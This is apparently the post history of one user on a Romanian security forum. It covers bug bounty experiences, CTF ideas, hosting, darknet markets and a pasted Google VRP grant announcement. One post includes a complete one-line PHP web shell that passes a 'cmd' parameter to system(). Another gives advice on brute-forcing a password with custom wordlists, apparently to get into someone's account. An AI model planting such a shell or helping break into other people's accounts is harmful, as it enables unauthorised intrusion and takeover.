0xStrait

Ce e 404 hidden shell? Daca e cum zici tu lasa link-ul complet cu parametrul. Aia e pagina default de la apache...

Digitalocean lafel 100% uptime aproximativ 2 ani, tin pe el un wordpress si il folosesc la teste uneori. Bine... pretul difera.

Mi se pare super ideea, daca s-ar potrivi timpul incat sa fiu liber, mi-ar placea sa particip la un CTF. Ca si platforme pt. conferinta se pot folosii Microsoft Team, BlueJeans sau cel mai rau caz Skype (toate platformele mentionate le-am intalnit in timpul interviurilor si au fost OK). Ca si idee de subiect ar fi: "Metodologia unui pentester roman" zic roman pentru ca sunt curios cum abordeaza un roman situatia, fiecare nationalitate are un anume stil, de ex: indienii se focuseaza mai multe pe partea de bruteforce tot ce tine legat de (asset discovery, auth bypass, token, etc), americanii aleg partea logica, chinezii sunt deep source. Pe mine ma omoara curiozitatea, cum este ziua unu pentester / security analyst / security engineer? Care este metodologia care o aplici pentru gasirea vulnerabilitatiilor in aplicatii WEB? De ce te folosesti? Se merita investitia in Shodan de exemplu? Cat de mult folosesti "self tool scripting"? De ce burpsuite si nu ZAP? Poate gasiti vre-un 0day intre timp si-l faceti public :)))

@makav3li mane daca ai inceput discutia du-o pana la capat, care-s forum-urile alea unde se gasesc exploit-uri si chestii private care tin de securitate si nu se gasesc pe motoarele de cautare care indexeaza? Stiu doua printre cele mai mari care au fost inchise de catre FBI, dark0de si omerta, pe ambele se vindeau dr*gs si nu se faceau livrari doar in tarile mai permisive (USA, Olanda, UK, Germania si probabil alte tari nordice), conturi de diferite platforme si medicamente care in mod normal aveai nevoie de reteta, in nici-un caz asasinari, p0rn0grafie si cacaturi cum zic toti ^vlogerii. Oricum cred ca la un research mai amanuntit se poate afla unde au migrat toti membri site-urilor mentionate mai sus, sti cum e, dispare unu apar 3.

@Bunicu2 urca un fisier /test.txt cu mesajul rstforums.com sa ne demonstrezi ca e forum-ul tau si daca am timp iti fac un test... dar pariez ca pica la chestii simple cum ar fi o lista de proxy-uri care acceseaza simulat forum-ul // sau urca test.php si lasa link =)))) <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Descarca asta sau incearca o alta alternativa care face acelasi lucru (bruteforce), mai ai nevoie de un wordlist. Ca sa cresti sansele de succes, trebuie sa analizezi indiciile (daca ai), sa cauti / creezi un wordlist custom in functie de limba, tipologie, hobbies and shit. Oricum nu e garantat 100% ca o sa reusesti. Succes! // Sper ca asta nu se catalogeaza ca idei de frauda, e pur educational. E nevoie de chestia aia cu "pe propria raspundere" ?

© 2017 All Rights Reserved Terms of Use Privacy Policy No-Spam Policy wtf?

De ce sa te complici cu asta? Ce sa mai faca vedetele care au 100k conturi false? Totul depinde de inteligenta oamenilor care o inconjoara pe sora ta, daca ei sunt atat de slab pregatiti incat sa nu recunoasca un cont fals, atunci sorry. Legea atractiei -> daca acorzi atentie chestiilor de genul asta, asta o sa atragi. Pur si simplu trebuie ignorat totul, daca te complici cu declaratii si dosare, la cum se misca lucrurile in ro o sa ai batai si mai mari de cap. Succes!

@grandson, daca virusul e construit pentru Windows nu v-a afecta si Iphone-ul care foloseste un alt sistem de operare (iOS).

Te referi la faptul ca (,) Chrome detecteaza si raporteaza mai departe? Daca la aste te referi, raspunsul este nu.

Felicitari! Triage & reward time? Sunt curios cat de repede se misca

@mDOS, frustrant... cred ca o buna parte din reusita se datoreaza perseverentei. Uneori o pauza de 1-2 zile ridica moralul. @BiosHell, ne impartasesti si tu din experientele tale?

Sunt mai multi interesati, cel putin cunosc 3-4 de pe acest forum. Mai bine discutatm aici... sunt sanse mai mari sa atragem interes si alte persoane dornice sa schimbe idei/tips/tricks/writeups. @mDOS, ce platforme folosesti? The biggest bounty? Programe private? Blog/twitter?

E copil nu va luati de el... @onlyz69 sau @GeorgeZ... era un proverb. "Nu ai cum sa vinzi castraveti gradinarului" sau cum plm era. Mai bine invata lucruri care te ajuta. Am mai zis-o intr-un post, sunt copii de 15-16 ani care fac sume ok din bug bounty, reprofileaza-te.

@YKelyan, sunt 99% convins ca e fake. @aelius, sunt curios cati bani produce un site ca ala?

Research Grants to support Google VRP Bug Hunters during COVID-19 April 20, 2020 Posted by Anna Hupa, Senior Strategist, Trust & Safety at Google In 2015, we launched our Vulnerability Research Grant program, which allows us to recognize the time and efforts of security researchers, including the situations where they don't find any vulnerabilities. To support our community of security researchers and to help protect our users around the world during COVID-19, we are announcing a temporary expansion of our Vulnerability Research Grant efforts. In light of new challenges caused by the coronavirus outbreak, we are expanding this initiative by creating a COVID-19 grant fund. As of today, every Google VRP Bug Hunter who submitted at least two remunerated reports from 2018 through April 2020 will be eligible for a $1,337 research grant. We are dedicating these grants to support our researchers during this time. We are committed to protecting our users and we want to encourage the research community to help us identify threats and to prevent potential vulnerabilities in our products. We understand the individual challenges COVID-19 has placed on the research community are different for everyone and we hope that these grants will allow us to support our Bug Hunters during these uncertain times. Even though our grants are intended to recognize the efforts of our frequent researchers regardless of their results, as always, bugs found during the grant are eligible for regular rewards per the Vulnerability Reward Program (VRP) rules. We are aware that some of our partners might not be interested in monetary grants. In such cases, we will offer the option to donate the grant to an established COVID-19 related charity and within our discretion, will monetarily match these charitable donations. For those of you who recently joined us or are planning to start, it’s never too late. We are committed to continue the Vulnerability Research Grant program throughout 2020, so stay tuned for future announcements and follow us on @GoogleVRP Soruce

Nici eu nu joc GTA. Ai incalcat regulamentul de ai primimt ban? Care a fost motivul? Intreb asta pentru ca aparent cei de la Rockstargames ofera o recompensa pentru incorrect ban.

Tipul e roman, si e in top 7 $1M hackers pe Hackerone.

Toti afonii sunt Security Analyst(i) acolo, am avut 7 participanti intr-un raport si a durat ~7 luni. Le-am explicat de mai multe ori scenariul de atac, le-am facut mai multe video-ui, le-am expus metoda "without user interaction" si tot nu am ajuns la un punct comun. Aveau username gen glassofbeer, dachshund, weiner_dog...

M-am gandit si eu la asta, gen sa personalizez mastile si sa le bag pe shopify =))) In 2 sapt +$10k

Nu sunt sigur daca mass media abuzeaza de acest subiect, dar cumva induce frica si nesiguranta pentru populatie. Esti impanzit de stiri pe toate retelele de socializare. Inca o dovada ca rasa umana e slab pregatita si vulnerabila din multe puncte de vedere. Poate par putin paranoic, dar sunt multe tari cu buget mare alocat cercetarii si totusi nimic concret... ?! Daca America ar fi fost afectata mai mult de acest virus (si aici ma refer la victime din clasa de sus), procesul de identificare si stabilizare a antidotului ar fi fost mult mai rapid. (my opinion)

Asta ar putea fi util: //

Interesanta ideea, cred ca v-a avea un mare succes in viitor. Multi din domeniu folosesc dork-uri si fac asta "manual". 👍 Ii lipseste doar search-ul.

Slabe sanse ca victima sa faca asta fara vreun CSRF/Clickjacking

Al 2-lea e flash? Felicitari!